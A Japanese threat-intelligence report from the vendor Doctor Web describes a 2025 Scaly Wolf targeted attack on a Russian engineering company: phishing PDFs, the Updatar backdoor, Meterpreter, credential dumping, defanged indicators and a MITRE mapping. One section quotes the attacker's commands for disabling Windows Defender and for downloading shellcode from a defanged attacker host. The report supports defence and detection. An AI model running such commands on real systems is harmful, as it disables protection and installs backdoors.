テイク2 : ロシアの機械工学系企業の機密情報を執拗に狙うScaly Wolf
ウイルスアラート | Hot news | 全てのニュース
2025年8月21日
株式会社Doctor Web Pacific
序論
2025年6月末、Doctor Webはロシアの機械工学系企業の担当者から連絡を受けました。その内容は、コンピューターの1台で頻繁に脅威が検出されているが感染を示唆するものなのか、それともなんらかの不具合によるものなのか調べてほしいというものでした。この件について調査を行った結果、アンチウイルスの動作は正常であり、同企業は標的型攻撃を受けていたということが明らかになりました。
攻撃はDr.Webアンチウイルスのインストールされていないコンピューターから始まっていました。このコンピューターのセキュリティ対策が不十分だったことでネットワークが侵害され、さらに何台かのデバイスを感染させてしまう結果となったのです。Doctor Webのスペシャリストは影響を受けたワークステーションの分析を行い、一連のイベントを再現しました。本稿では、脅威アクターが攻撃に用いた感染経路と手法について解説します。
攻撃および使用されたツールに関する全般的情報
2025年5月の初め、標的となった企業に金融関連を装ったメールがたて続けに届くようになりました。メールにはフィッシングPDFドキュメントとパスワード保護されたZIPアーカイブが含まれていました。
メール自体には本文はありません。
おとりのPDFドキュメントには、添付のアーカイブに「金融関連文書」が含まれており、それを解凍するにはドキュメント内に記載されているパスワードを使用する必要があるという内容が記されています。このフィッシングPDFのデザインはさまざまで、必要最低限のシンプルなものもあれば、可能な限り公式文書に似せたものもありました。
シンプルな例 :
公式文書を模した例 :
アーカイブ内のファイルは実際には実行ファイルでしたが、「二重」拡張子(Акт Сверки.pdf.exe)を付けることでPDFファイルに偽装されていました。Windowsでは、ユーザーにとって煩わしくないようデフォルトで拡張子が表示されないようになっています。ファイルに「二重」拡張子が付いている場合は2つ目の拡張子のみが非表示になるため、ユーザーには本来の拡張子が表示されず無害なファイルであるように見えるのです。
Doctor Webのアンチウイルスラボは2025年5月6日にこのような悪意のあるメールの最初の検体を受け取り、 Trojan.Updatar.1 がウイルスデータベースに追加されました。 Trojan.Updatar.1 はモジュール型バックドアUpdatarによる感染の第一段階を担っており、感染チェーンを進行させる別のコンポーネントを標的のシステムにダウンロードするよう設計されています。このバックドアは感染させたコンピューターから機密データを収集する目的で用いられています。
Trojan.Updatar.1 は新しいマルウェアではないということに触れておく必要があります。このマルウェアの最初の検体がDoctor Webのエキスパートの目を引いたのは1年前のことでした。しかしながら、 Trojan.Updatar.1 によってダウンロードされる感染チェーンのその先のステップを入手することはかないませんでした。それらはC2サーバーから自動的にダウンロードされるのではなく、サーバーを操作する人物から直接コマンドを受け取ることでダウンロードされていたためです。今回の Trojan.Updatar.1 を用いたアクティブな攻撃に関する調査によって、これまで欠けていたこのダウンローダの残りのピースを追跡することが初めて可能となったのです。
このたび検出された新たなバージョンを調査した結果、 Trojan.Updatar.1 の機能は最初の発見以来さほど大きく変更されていないことが明らかになりました。ただし、解析をより困難にするためのユニークな難読化が実装されています。この難読化手法はDoctor Webのウイルスアナリストにより「RockYou Obfuscation(RockYou難読化)」と名づけられました。この難読化の要となる特性は、辞書ファイル(ワードリスト)RockYou.txtに含まれる文字列がトロイの木馬の本体内で常に初期化されるというものです。これらの文字列を使用して、プログラムのメイン機能に影響を及ぼさないさまざまな操作が実行されます。一方、プログラムの動作に直接関連する文字列はXOR演算と小さなオフセットによってエンコードされています。このXOR演算とオフセットに使用されるキーは Trojan.Updatar.1 の検体ごとにランダム化されています。
RockYou.txtはよく使われるパスワード3,000万以上を収録したリストで、過去に発生した重大な情報漏えいが元となって作成されています。コンピューターシステム保護の信頼性をテストするためにセキュリティスペシャリストによって使用されるだけでなく、アカウントをハッキングする目的で悪意のあるアクターによっても使用されます。
以下の画像は、トロイの木馬で使用されている難読化とRockYou辞書内にある対応する単語の例です。
以下の図は攻撃の進行を時系列で示したものです。
1台目のコンピューターに対する攻撃
今回の標的型攻撃で最初のコンピューターが感染したのは2025年5月12日、すなわち特定された Trojan.Updatar.1 の亜種がDoctor Webのウイルスデータベースに追加されてから約1週間後のことでした。標的となったコンピューターにDr.Webアンチウイルス保護が導入されていなかったというただそれだけのことが感染を招いたのです。そして、悪意のあるメールの1つに含まれてトロイの木馬が送り込まれ、ユーザーが「ドキュメント」を開くことで難なく起動しました。感染から1時間後、このトロイの木馬 Trojan.Updatar.1 によってシステム内に別のバックドアコンポーネント Trojan.Updatar.2 と Trojan.Updatar.3 がダウンロード、インストールされました。
5月14日、攻撃者は Trojan.Updatar.3 を使用して、shell.exeをダウンロードするためのBITSサービスタスクをコンピューター上にインストールしました。 shell.exeはMeterpreterツールの本体をダウンロードするためのシェルコードを含むプログラムで、Meterpreterはコンピューターシステムのセキュリティテストに使用されるMetasploitに含まれるバックドアユーティリティです。
次に、Trojan.Updatar.3 モジュールの1つ(FileManager.exe)がシステムにインストールされました。このモジュールはコンピューターへのファイルのアップロードやダウンロードを担っており、感染させたシステムからファイルを盗む目的で使用されていました。
その後、攻撃者はLSASSプロセスをダンプするよう設計されたユーティリティ Tool.HandleKatz を使用してWindowsユーザーのアカウントデータを取得し、続けて、リモートデスクトッププロトコル(RDP)経由でより簡単にシステムにログインするためのツールRDP Wrapper(Program.Rdpwrap.7) をインストールしました。そのほかに、トラフィックをトンネリングするためのユーティリティ Tool.Chisel と Tool.Frp もインストールされています。
2台目のコンピューターに対する攻撃
2台目となるコンピューターの侵害は2025年5月14日に開始されました。攻撃者は最初に感染させたコンピューターのメモリから窃取したアカウントデータを使用して社内ネットワークにアクセスし、この2台目のコンピューターがさらなる侵入に適しているかどうかを判断するためにリモートからシステム上でコマンドを実行しています。
それから1週間以上が経過した5月23日、悪意のあるアクターは同コンピューター上にBITSサービスタスクをインストールして Trojan.Updatar.1 をダウンロードさせました。しかしながら、このコンピューターにはDr.Webアンチウイルスがインストールされていたため、トロイの木馬の起動はブロックされました。
5月29日、攻撃者は再び社内ネットワークを利用してリモートで同コンピューターにアクセスし、手動で Trojan.Updatar.2 と Trojan.Updatar.3 をインストールすることでシステム内での足がかりを得ることに成功しています。
2025年6月3日には別のBITSサービスタスクを使用してMeterpreterバックドアがインストールされました。
3台目のコンピューターに対する攻撃
3台目のコンピューターへの侵入の糸口となったのは窃取されたリモートデスクトップサービス(RDP)のユーザー認証情報です。RDPのユーザー認証情報を入手した攻撃者は、2025年6月23日、その侵害されたRDPアカウントを使用してコンピューターへの接続を開始しました。次に、システム内での足がかりを得てリモートシェルにアクセスするためにMetasploit Frameworkに含まれる標準ツールの1つを起動させ、このツールを介してPowerShellスクリプトとしてペイロードを実行しようと試みています。しかしながら、このコンピューターにインストールされていたDr.Webアンチウイルスによってその動作はブロックされ、実行試行は DPC:BAT.Starter.613 として検出されました。
この悪意のあるスクリプトは、2つ目のPowerShellスクリプトを含むbase64エンコードされたデータを解凍し、それを実行するはずでした。2つ目のスクリプトにはPowerShell アドレス空間で実行されるbase64エンコードされたシェルコードが含まれています。
この一連のスクリプト実行によって、アドレス77[.]105[.]161[.]30からMeterpreterバックドアをシステム内にダウンロードするための最初の段階が開始されます。
スクリプト実行による侵入の試みがアンチウイルスによって阻止された後、悪意のあるアクターはMetasploit Frameworkに含まれる標準ツールの使用に見切りをつけ、別の手段、すなわちRemComツールを使用するようになりました。このツールはDr.WebアンチウイルスによってProgram.RemoteAdmin.877 として検出されますが、今回のケースではブロックはされていません。RemComは標準的なリモート管理ツールであり、アンチウイルスのデフォルト設定ではそのようなツールの実行が許可されているからです
攻撃者はこのツールを使用して次のコマンドを実行しています。
ipconfig
powershell -Command "Set-MpPreference -MAPSReporting 0"
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
powershell -Command "Get-MpPreference | Select -ExpandProperty ExclusionPath"
powershell -Command "Set-MpPreference -MAPSReporting 0"
tasklist
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
chcp
wmic service where "name='DrWebAVService'" get PathName
reg query "HKLM\SOFTWARE\DrWeb" /v Version
wmic product where "name like 'DrWeb%'" get Name, Version
sc qc DrWebAVService
reg query "HKLM\SOFTWARE\WOW6432Node\DrWeb" /v Version
tasklist
findstr /i drweb
findstr /i dr
findstr /i drw
findstr /i drs
findstr /i dws
wmic product where "name like 'Dr.Web%'" get Name, Version
reg query "HKLM\SOFTWARE\WOW6432Node\Dws" /v Version
netstat -a -o -n
powershell -Command "bitsadmin /transfer "DownloadJob" "hxxps[:]//roscosmosmeet[.]online/shellcode.exe" "$env:USERPROFILE\Pictures\zabix.exe""
powershell -Command "Get-MpComputerStatus"
powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"
tasklist
findstr /i drweb
sc query
findstr /i drweb
cmd: installer.exe
コンピューター上にインストールされているアンチウイルスソフトウェアを特定し、システム内に足場を築くためのポイントをいくつかインストールしようと試みています。
- shellcode.exe — Meterpreterの亜種の1つ(BackDoor.Shell.244)で、シェルコードによってそこにMeterpreter本体がダウンロードされます。
- installer.exe — Trojan.Updatar.1.
これらの試みもすべてDr.Webアンチウイルスによって検出され、ブロックされました。
マルウェアと攻撃者のインフラストラクチャの特徴
- 今回の標的型攻撃で用いられた悪意のあるプログラムの操作には、複数のC2サーバーが使用されていた。ただし、マルウェアのダウンロード元としては主にドメインroscosmosmeet[.]onlineが使用されていた
- Meterpreterバックドアツールのすべての亜種はIPアドレス 77[.]105[.]161[.]30にリンクされ、異なるポートにアクセスしていた。
- モジュール Trojan.Updatar.3 のすべての亜種は通信にドメインupdating-services[.]comを使用していた。
モジュール Trojan.Updatar.1 と Trojan.Updatar.2 はバージョンに応じてドメインadobe-updater[.]netまたはupdatingservices[.]netを使用していた。
攻撃の背後にいるのは誰か
複数のマルウェア検体から収集されたアーティファクト(痕跡)により、今回の攻撃を仕掛けたAPTグループを特定することに成功しました。アーティファクトは次の場所で発見されています。
- モジュール Trojan.Updatar.3 の亜種内
- 脅威アクターのインフラストラクチャ解析中に発見された偽アプリ内(ただし、今回の攻撃キャンペーンでは使用されず)
そのほか、同企業に対する前回の標的型攻撃で使用されていた悪意のあるプログラムの1つでも発見されています。
このすべてのアーティファクトが示していたのが、これら悪意のあるツールはScaly Wolfグループと直接関連のある同じ開発者によって作成されているということでした。
2年前同様、Scaly Wolfグループはシステム内に足がかりを得て偵察を行うために独自のモジュール型バックドアを用いています。前回の攻撃と異なっているのは、今回の攻撃キャンペーンではコンピューターへの最初のアクセスにMaaS(Malware as a Service : サービスとしてのマルウェア)トロイの木馬が使用されていないという点です。
また、今回の攻撃ではポストエクスプロイト(post-exploitation)とシステム内での足場固めに標準的なツールが使用されるようになっています。
- トラフィックをトンネリングするためのさまざまなオープンソースツール
- Metasploitフレームワーク
- PCにリモートアクセスするためのさまざまなプログラム
Scaly Wolfグループに見られるもう1つの特徴は、マルウェアを含んだメールをMail.ruサービスに登録されたメールアドレスから送信しているというものです。
攻撃者のツール
先に述べたとおり、Updatarバックドアのインフラストラクチャ解析中にDoctor Webのスペシャリストは悪意のある偽アプリを複数発見しました。それらに加えて、トロイの木馬 Trojan.Uploader.36875 と BackDoor.Siggen2.5423 も発見されています。これらは今回の攻撃では使用されていませんが、Scaly Wolfグループによる他の攻撃キャンペーンで用いられている可能性があります。
Trojan.Uploader.36875 は感染させたコンピューターから盗み取ったファイルを攻撃者のサーバーに送信するよう設計されており、 BackDoor.Siggen2.5423 はVNC経由でコンピューターを遠隔操作することを可能にします。そして偽アプリが、被害者をだまして操るためのさまざまなメッセージウィンドウを表示させます。これらの偽アプリはコンピューターに直接的な危害を与えるわけではありませんが、悪意のあるアクターが攻撃を実行するうえでの一翼を担っています。以下の画像は表示される偽のメッセージウィンドウの例です。
セキュリティソフトウェアの削除に関する偽のメッセージ :
スキャンが完了し脅威が削除されたことを知らせる、Windows標準搭載のウイルス対策ソフトを装った偽のメッセージ :
「Windowsの動作を安定させる」ためにシステム設定を適用する必要があると通知する偽のメッセージ :
実際には、偽アプリはコマンド引数を受け取り、ユーザーがメッセージウィンドウ内の「OK」ボタンをクリックすると指定されたアプリを起動させる仕掛けになっています。
以下はScaly Wolfグループが使用するツールとマルウェアのリストです :
Trojan.Updatar.1
Trojan.Updatar.2
Trojan.Updatar.3
Trojan.Uploader.36875
BackDoor.Siggen2.5423
BackDoor.Shell.244 (Meterpreter)
BackDoor.Meterpreter.259
Program.RemoteAdmin.877 (RemCos)
Tool.HandleKatz
Tool.Chisel
Tool.Frp
Updatarバックドアとそのコンポーネントの詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。
Trojan.Updatar.1 の詳細 ※英語
Trojan.Updatar.2 の詳細 ※英語
Trojan.Updatar.3 の詳細 ※英語
Trojan.Uploader.36875 の詳細 ※英語
BackDoor.Siggen2.5423 の詳細 ※英語
結論
標的型攻撃は依然として企業にとって深刻な情報セキュリティ脅威となっています。本稿で分析した事例から、脅威アクターは情報システムにアクセスするために創意工夫を凝らした柔軟な手法を駆使していることが分かります。ハッカーが利用する侵入経路は多岐にわたります。フィッシングメール、脆弱性の悪用、アンチウイルス保護の導入されていないコンピューター、そしてリモート管理ツールなどアンチウイルスがデフォルトで実行を許可しているソフトウェアを悪用するケースさえみられます。
つまり、セキュリティソリューションがインストールされている場合であっても、攻撃者はそれらを回避しようとしてくる場合があるのです。より強固な保護を確実なものにするため、社内コンピューター上のアンチウイルスを慎重に設定し、デフォルト設定を残さないようにすることが推奨されます。また、脆弱性を悪用されることによる感染のリスクを低減するために、利用可能なすべてのOSおよびソフトウェアのアップデートをインストールするようにしてください。
MITREマトリックス
| Stage(段階) | Technique(技術・手法) |
| Initial access(初期アクセス) | Phishing(フィッシング) : T1566 |
| Execution(実行) | User execution(ユーザーによる実行) : T1204 Software Deployment Tools(ソフトウェア展開ツール) : T1072 |
| Persistence(永続化) | BITS Jobs(BITSジョブ) : T1197 Modify Registry(レジストリの変更) : T1112 Boot or Logon Autostart Execution(ブートまたはログオン時の自動実行) : T1547 |
| Detection prevention(防御回避) | Obfuscated Files or Information(難読化されたファイルや情報) : T1027 |
| Data collection(データ収集) | Data from Local System(ローカルシステムのデータ) : T1005 Screen Capture(スクリーンキャプチャ) : T1113 |
| Command and control(コマンド・アンド・コントロール) | Web Protocols(Webプロトコル) : T1437.001 Encrypted Channel(暗号化チャンネル) : T1573 |